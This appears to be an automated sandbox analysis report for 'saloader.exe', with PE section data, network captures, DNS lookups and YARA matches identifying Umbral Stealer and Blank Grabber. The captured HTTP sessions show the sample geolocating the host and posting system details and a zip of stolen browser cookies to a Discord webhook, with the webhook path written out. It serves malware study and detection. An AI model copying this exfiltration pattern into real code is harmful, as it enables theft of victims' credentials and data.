| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0x38aa4 | 0x38c00 | e30281924731c0acc0db6a2046fd7499 | False | 0.3988031731828194 | data | 6.0659771708952155 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x3c000 | 0x550 | 0x600 | 962661cf515c57234d66775c661dfade | False | 0.4134114583333333 | data | 4.575008625258809 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x3e000 | 0xc | 0x200 | 0ba71f33e486e8552fc7ee8251bdd63d | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_VERSION | 0x3c0a0 | 0x2c4 | data | | | 0.4449152542372881 |
| RT_MANIFEST | 0x3c364 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |
| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Nov 30, 2024 02:29:40.138663054 CET | 49763 | 80 | 192.168.2.7 | 208.95.112.1 |
| Nov 30, 2024 02:29:40.258677959 CET | 80 | 49763 | 208.95.112.1 | 192.168.2.7 |
| Nov 30, 2024 02:29:40.259562969 CET | 49763 | 80 | 192.168.2.7 | 208.95.112.1 |
| Nov 30, 2024 02:29:40.259860992 CET | 49763 | 80 | 192.168.2.7 | 208.95.112.1 |
| Nov 30, 2024 02:29:40.379735947 CET | 80 | 49763 | 208.95.112.1 | 192.168.2.7 |
| Nov 30, 2024 02:29:41.564929008 CET | 80 | 49763 | 208.95.112.1 | 192.168.2.7 |
| Nov 30, 2024 02:29:41.586730003 CET | 49763 | 80 | 192.168.2.7 | 208.95.112.1 |
| Nov 30, 2024 02:29:41.707088947 CET | 80 | 49763 | 208.95.112.1 | 192.168.2.7 |
| Nov 30, 2024 02:29:41.707173109 CET | 49763 | 80 | 192.168.2.7 | 208.95.112.1 |
| Nov 30, 2024 02:30:02.124218941 CET | 49813 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:02.124258995 CET | 443 | 49813 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:02.124339104 CET | 49813 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:02.124918938 CET | 49813 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:02.124938965 CET | 443 | 49813 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:03.386985064 CET | 443 | 49813 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:03.387061119 CET | 49813 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:03.389544964 CET | 49813 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:03.389555931 CET | 443 | 49813 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:03.389846087 CET | 443 | 49813 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:03.402585983 CET | 49813 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:03.443337917 CET | 443 | 49813 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:03.767364979 CET | 49813 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:03.767398119 CET | 443 | 49813 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:03.824661016 CET | 443 | 49813 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:03.872874975 CET | 49813 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:04.138380051 CET | 443 | 49813 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:04.138505936 CET | 443 | 49813 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:04.138673067 CET | 49813 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:04.145239115 CET | 49813 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:04.146473885 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:04.146512985 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:04.146609068 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:04.146863937 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:04.146879911 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:05.389278889 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:05.391019106 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.391027927 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:05.763874054 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.763899088 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:05.764249086 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.764249086 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.764265060 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:05.764282942 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:05.764369011 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.764400005 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:05.764488935 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.764506102 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.764563084 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:05.764681101 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.764693975 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:05.764709949 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.764719009 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:05.764730930 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.764743090 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.764744997 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:05.764755011 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:05.764857054 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.764877081 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:05.764934063 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.764947891 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:05.764962912 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.764966965 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:05.764990091 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.765002966 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:05.765053034 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.765072107 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:05.765130043 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.765141964 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:05.765167952 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.765176058 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:05.765259981 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.765273094 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:05.765326023 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.765382051 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.765444040 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.765501022 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.765571117 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.765642881 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.765716076 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.765887976 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.765990019 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.807326078 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:05.807706118 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.807871103 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.807918072 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.807981014 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.808043957 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.808106899 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.808167934 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.808214903 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.808296919 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.823370934 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:05.823569059 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.823781967 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.823832989 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.823843002 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.823860884 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.823904991 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.823921919 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.823939085 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.823981047 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.871325970 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:05.871423960 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:05.915327072 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:06.126723051 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:07.168490887 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:07.168576956 CET | 443 | 49819 | 162.159.129.233 | 192.168.2.7 |
| Nov 30, 2024 02:30:07.168661118 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Nov 30, 2024 02:30:07.169321060 CET | 49819 | 443 | 192.168.2.7 | 162.159.129.233 |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Nov 30, 2024 02:29:39.999550104 CET | 52511 | 53 | 192.168.2.7 | 1.1.1.1 |
| Nov 30, 2024 02:29:40.137722015 CET | 53 | 52511 | 1.1.1.1 | 192.168.2.7 |
| Nov 30, 2024 02:30:01.985475063 CET | 50777 | 53 | 192.168.2.7 | 1.1.1.1 |
| Nov 30, 2024 02:30:02.123331070 CET | 53 | 50777 | 1.1.1.1 | 192.168.2.7 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Nov 30, 2024 02:29:39.999550104 CET | 192.168.2.7 | 1.1.1.1 | 0xe427 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false |
| Nov 30, 2024 02:30:01.985475063 CET | 192.168.2.7 | 1.1.1.1 | 0x5081 | Standard query (0) | discordapp.com | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Nov 30, 2024 02:29:40.137722015 CET | 1.1.1.1 | 192.168.2.7 | 0xe427 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false |
| Nov 30, 2024 02:30:02.123331070 CET | 1.1.1.1 | 192.168.2.7 | 0x5081 | No error (0) | discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001) | false |
| Nov 30, 2024 02:30:02.123331070 CET | 1.1.1.1 | 192.168.2.7 | 0x5081 | No error (0) | discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001) | false |
| Nov 30, 2024 02:30:02.123331070 CET | 1.1.1.1 | 192.168.2.7 | 0x5081 | No error (0) | discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001) | false |
| Nov 30, 2024 02:30:02.123331070 CET | 1.1.1.1 | 192.168.2.7 | 0x5081 | No error (0) | discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001) | false |
| Nov 30, 2024 02:30:02.123331070 CET | 1.1.1.1 | 192.168.2.7 | 0x5081 | No error (0) | discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001) | false |

• discordapp.com
• ip-api.com
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.7 | 49763 | 208.95.112.1 | 80 | 520 | C:\Users\user\Desktop\saloader.exe |

Timestamp | Bytes transferred | Direction | Data

Nov 30, 2024 02:29:40.259860992 CET | 79 | OUT
GET /json/?fields=225545 HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Nov 30, 2024 02:29:41.564929008 CET | 381 | IN
HTTP/1.1 200 OK
Date: Sat, 30 Nov 2024 01:29:40 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 204
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 32 32 38 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 7d
Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-228.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.228"}


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.7 | 49813 | 162.159.129.233 | 443 | 520 | C:\Users\user\Desktop\saloader.exe |

Timestamp | Bytes transferred | Direction | Data

2024-11-30 01:30:03 UTC | 363 | OUT
POST /api/webhooks/1310580388070031360/HcT5cAwFckSLk1OKu346uVDw7gzPyJJvcWmU8BKJrBQSUsE3Q1GCqDtVn5MK3JlldJBn HTTP/1.1
Accept: application/json
User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
Content-Type: application/json; charset=utf-8
Host: discordapp.com
Content-Length: 939
Expect: 100-continue
Connection: Keep-Alive

2024-11-30 01:30:03 UTC | 939 | OUT
Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 40 65 76 65 72 79 6f 6e 65 22 2c 22 65 6d 62 65 64 73 22 3a 5b 7b 22 74 69 74 6c 65 22 3a 22 55 6d 62 72 61 6c 20 53 74 65 61 6c 65 72 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 2a 2a 5f 5f 53 79 73 74 65 6d 20 49 6e 66 6f 5f 5f 2a 2a 5c 72 5c 6e 60 60 60 61 75 74 6f 68 6f 74 6b 65 79 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4e 61 6d 65 3a 20 36 31 30 39 33 30 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4f 53 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 72 5c 6e 54 6f 74 61 6c 20 4d 65 6d 6f 72 79 3a 20 34 20 47 42 5c 72 5c 6e 55 55 49 44 3a 20 31 39 38 38 32 37 34 32 2d 43 43 35 36 2d 31 41 35 39 2d 39 37 37 39 2d 46 42 38 43 42 46 41 31 45 32 39 44 5c 72 5c 6e 43 50 55 3a 20 49 6e
Data Ascii: {"content":"@everyone","embeds":[{"title":"Umbral Stealer","description":"**__System Info__**\r\n```autohotkey\r\nComputer Name: 610930\r\nComputer OS: Microsoft Windows 10 Pro\r\nTotal Memory: 4 GB\r\nUUID: 19882742-CC56-1A59-9779-FB8CBFA1E29D\r\nCPU: In

2024-11-30 01:30:03 UTC | 25 | IN
HTTP/1.1 100 Continue

2024-11-30 01:30:04 UTC | 1369 | IN
HTTP/1.1 404 Not Found
Date: Sat, 30 Nov 2024 01:30:03 GMT
Content-Type: application/json
Content-Length: 45
Connection: close
Cache-Control: public, max-age=3600, s-maxage=3600
strict-transport-security: max-age=31536000; includeSubDomains
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1732930205
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Set-Cookie: __cf_bm=BX4kI7Aq45FoNWq_RPBuj0TQviwCVhF8WSsGHJmfl.Y-1732930203-1.0.1.1-naczNhouxrOVdJppKEeMAwYsDG3xslKJi8usFy1ZtObLvPTpsTP6.RSLJkVGTsXd6GPQa3NRVGZ1aPdUt4lQWg; path=/; expires=Sat, 30-Nov-24 02:00:03 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=utAiGLH4w22T4tKlph09QoYkB6UjvXL1X0iPPTk8YlHoVtxpSjvd7wmzHfXezhS7tdN9HCXx2UqgbRHMyWmRuNlUbsg43h9RkA2WfHiQegZWiWRcWK9Mm9OpVJoicj9H"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: __cfruid=5426df9ee3509d1e165b7f3abf3be05aea69702d-1732930203; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=_FNztmRJ4OKeKfK7xSTIvQ4CxD40lHLgPDhYVb9W09g-1732930203983-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None

2024-11-30 01:30:04 UTC | 97 | IN
Data Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 65 61 37 31 31 65 63 65 65 63 35 39 65 31 37 2d 45 57 52 0d 0a 0d 0a 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
Data Ascii: Server: cloudflareCF-RAY: 8ea711eceec59e17-EWR{"message": "Unknown Webhook", "code": 10015}


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        1 | 192.168.2.7 | 49819 | 162.159.129.233 | 443 | 520 | C:\Users\user\Desktop\saloader.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-11-30 01:30:05 UTC | 534 | OUT | POST /api/webhooks/1310580388070031360/HcT5cAwFckSLk1OKu346uVDw7gzPyJJvcWmU8BKJrBQSUsE3Q1GCqDtVn5MK3JlldJBn HTTP/1.1
                                                                                        Accept: application/json
                                                                                        User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                                                                        Content-Type: multipart/form-data; boundary="0fc477bf-c5b0-4025-8bca-1c50d6ea02f2"
                                                                                        Host: discordapp.com
                                                                                        Cookie: __cfruid=5426df9ee3509d1e165b7f3abf3be05aea69702d-1732930203; _cfuvid=_FNztmRJ4OKeKfK7xSTIvQ4CxD40lHLgPDhYVb9W09g-1732930203983-0.0.1.1-604800000
                                                                                        Content-Length: 655373
                                                                                        Expect: 100-continue
                                                                                        2024-11-30 01:30:05 UTC40OUTData Raw: 2d 2d 30 66 63 34 37 37 62 66 2d 63 35 62 30 2d 34 30 32 35 2d 38 62 63 61 2d 31 63 35 30 64 36 65 61 30 32 66 32 0d 0a
                                                                                        Data Ascii: --0fc477bf-c5b0-4025-8bca-1c50d6ea02f2
                                                                                        2024-11-30 01:30:05 UTC140OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 55 6d 62 72 61 6c 2d 36 31 30 39 33 30 2e 7a 69 70 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 55 6d 62 72 61 6c 2d 36 31 30 39 33 30 2e 7a 69 70 0d 0a 0d 0a
                                                                                        Data Ascii: Content-Type: application/zipContent-Disposition: form-data; name=file; filename=Umbral-610930.zip; filename*=utf-8''Umbral-610930.zip
                                                                                        2024-11-30 01:30:05 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 08 08 00 c8 ad 7d 59 9c 5c 22 6e ed 00 00 00 21 01 00 00 23 00 00 00 42 72 6f 77 73 65 72 73 5c 43 6f 6f 6b 69 65 73 5c 43 68 72 6f 6d 65 20 43 6f 6f 6b 69 65 73 2e 74 78 74 7d cc 4b 72 82 30 00 00 d0 75 9c f1 28 d0 84 90 44 16 5d 50 84 0a 11 44 8a 50 dc 38 54 fe 83 f2 17 e5 f4 ed 09 fa 0e f0 c4 bc 69 f2 3a 15 af cd 0d f8 de 49 07 6f c0 50 f7 5f 3a 40 18 cb 98 10 86 65 a4 30 2a 6f 14 80 dc 8b a5 7a 40 82 12 16 10 14 20 11 20 5b af c4 7f 02 42 19 a3 44 86 7f 01 c1 18 38 e6 16 10 84 de ef 4e 9c 74 a1 32 f9 d7 08 1e 5c 6a e2 38 bb f7 0c 35 54 5f e2 68 3f 24 6d 28 9f f4 c8 c1 8f a8 bb f4 3f 5e ef 18 4f 1b 55 cd e2 7e 4e 45 75 f0 3e ce 9c db 8b 34 26 db 36 48 59 e2 4c 7e d8 ca da 8b 0b cb 48 cc 81 ce 81 5e 3f d2 50 cd f8 31 9f 1d ab e4 7c
                                                                                        Data Ascii: PK}Y\"n!#Browsers\Cookies\Chrome Cookies.txt}Kr0u(D]PDP8Ti:IoP_:@e0*oz@ [BD8Nt2\j85T_h?$m(?^OU~NEu>4&6HYL~H^?P1|
                                                                                        2024-11-30 01:30:05 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                                                        2024-11-30 01:30:07 UTC | 1169 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Sat, 30 Nov 2024 01:30:07 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 45
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                        x-ratelimit-limit: 5
                                                                                        x-ratelimit-remaining: 4
                                                                                        x-ratelimit-reset: 1732930208
                                                                                        x-ratelimit-reset-after: 1
                                                                                        via: 1.1 google
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Set-Cookie: __cf_bm=aXbYGK.h78xwK59Y3zvJtf8zZItkbtguGaqrufqS5Dw-1732930207-1.0.1.1-PmG8kOKKAkIVtb4wQ0WSuJVmklrn60FZyzlev6m7NQ6A166jfFJVicTpcOJvPP3KlsQcjVCpiHSFRjvPTRfNQQ; path=/; expires=Sat, 30-Nov-24 02:00:07 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=beVAM5BjnHJt4qYaBI7LVhsVatipCKIM7pkCxp3X2gpGcCB0rZLBaoUrHxdXCes%2FRqecfMqNxp3Nm4HTgWTmrnOuLZuINeodq5dszGmQ4Z4Um0mc%2FC525Ckt0Nn8qwFJ"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8ea711f969ac7cb1-EWR
                                                                                        {"message": "Unknown Webhook", "code": 10015}


                                                                                        Target ID:0
                                                                                        Start time:20:28:55
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Users\user\Desktop\saloader.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\Desktop\saloader.exe"
                                                                                        Imagebase:0x2113d640000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:1E10AF7811808FC24065F18535CF1220
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.1924265199.000002113FA90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1924265199.000002113F9B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.1924265199.000002113F4A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000000.1205880732.000002113D642000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000000.00000000.1205880732.000002113D642000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.1924265199.000002113F9E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.1924265199.000002113F3F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1924265199.000002113F3F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
